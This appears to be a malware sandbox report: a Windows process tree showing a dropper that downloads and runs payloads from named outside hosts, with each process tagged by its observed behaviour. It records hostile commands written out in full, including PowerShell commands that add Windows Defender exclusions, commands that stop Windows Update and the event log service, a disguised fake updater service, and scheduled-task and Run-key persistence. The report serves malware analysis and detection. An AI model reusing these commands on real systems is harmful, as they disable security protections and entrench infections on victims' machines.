C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2020
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1724
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2852
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2860
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2896
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3428
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3556
-
C:\Users\Admin\AppData\Local\Temp\3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe"C:\Users\Admin\AppData\Local\Temp\3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe"2⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4104
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Users\Admin\AppData\Local\Temp\1677919094.exeC:\Users\Admin\AppData\Local\Temp\1677919094.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3436
-
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66newtpp.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.66newtpp.exe.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\sysppvrdnvs.exeC:\Windows\sysppvrdnvs.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:968
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1424
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4384
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4368
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1568
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1116
-
-
-
C:\Users\Admin\AppData\Local\Temp\1372228982.exeC:\Users\Admin\AppData\Local\Temp\1372228982.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4432 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:4056
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:1880
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:4580
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1240923462.exeC:\Users\Admin\AppData\Local\Temp\1240923462.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4332
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpcache.ussc.orgcss67065a0933c9e_UUESUpdater.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpcache.ussc.orgcss67065a0933c9e_UUESUpdater.exe.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Users\Admin\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"C:\Users\Admin\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Users\Admin\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe"C:\Users\Admin\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe" --checker5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4664
-
-
C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"4⤵
- Executes dropped EXE
PID:3628
-
-
C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3196 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DHCP Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmp3EF8.tmp"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4176
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DHCP Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp4199.tmp"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe"C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe"C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3012
-
-
-
C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txttIelklVKfumqUfa.exe.exe"C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txttIelklVKfumqUfa.exe.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txttIelklVKfumqUfa.exe.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4448
-
-
C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txttIelklVKfumqUfa.exe.exe"C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txttIelklVKfumqUfa.exe.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4520
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3316 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3316 -s 3004⤵
- Program crash
PID:3040
-
-
-
C:\Users\Admin\AppData\Local\Temp\http146.70.24.213do1654365431.exe.exe"C:\Users\Admin\AppData\Local\Temp\http146.70.24.213do1654365431.exe.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.2058080markdef.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.2058080markdef.exe.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.103offrandom.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.103offrandom.exe.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:8
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.103offdef.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.103offdef.exe.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.100offdef.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.100offdef.exe.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3488
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.100offrandom.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.100offrandom.exe.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxvnklng5th.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxvnklng5th.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4296 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxvnklng5th.exe.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1844 -
C:\Users\Public\InformationCheck.exe"C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au35⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2924
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxngqwplngown.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxngqwplngown.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4056 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxngqwplngown.exe.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4340 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 7364⤵
- Program crash
PID:4232
-
-
-
C:\Users\Admin\AppData\Local\Temp\http46.8.229.59thebiggetlab.exe.exe"C:\Users\Admin\AppData\Local\Temp\http46.8.229.59thebiggetlab.exe.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\is-GDE30.tmp\is-A504O.tmp"C:\Users\Admin\AppData\Local\Temp\is-GDE30.tmp\is-A504O.tmp" /SL4 $B01F6 "C:\Users\Admin\AppData\Local\Temp\http46.8.229.59thebiggetlab.exe.exe" 3941678 522244⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4772 -
C:\Users\Admin\AppData\Local\Middle Media Player\middlemediaplayer32.exe"C:\Users\Admin\AppData\Local\Middle Media Player\middlemediaplayer32.exe" -i5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe"C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe"C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4752
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1548 -
C:\Users\Public\InformationCheck.exe"C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au35⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1764
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.26JavUmar.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.26JavUmar.exe.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:220 -
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3340
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1192
-
-
-
C:\Users\Admin\AppData\Local\Temp\http154.12.82.11808win.exe.exe"C:\Users\Admin\AppData\Local\Temp\http154.12.82.11808win.exe.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4328
-
-
C:\Users\Admin\AppData\Local\Temp\http103.130.147.211Filesjgt.exe.exe"C:\Users\Admin\AppData\Local\Temp\http103.130.147.211Filesjgt.exe.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:3940 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2600
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:4768
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:1660
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1824
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:4176
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:3708
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:1844
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:712
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4436
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:3608
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:2944
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:1072
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:1696
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:1276
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpmkas.rizwanmano.comprog66b837290469c_vidar.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmkas.rizwanmano.comprog66b837290469c_vidar.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4324 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2652 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\BFHJECAAAFHI" & exit5⤵
- System Location Discovery: System Language Discovery
PID:4920 -
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:60
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpmkas.rizwanmano.comrevada66af9bdbf0f60_Team.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmkas.rizwanmano.comrevada66af9bdbf0f60_Team.exe.exe"3⤵
- Executes dropped EXE
PID:2724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit2⤵
- System Location Discovery: System Language Discovery
PID:468
-
-
C:\Users\Public\jsc.exeC:\Users\Public\jsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2148
-
-
C:\Users\Public\jsc.exeC:\Users\Public\jsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1100
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3664
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3856
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4008
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4928
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4548
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3148
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3780
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:4180
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:5108
-
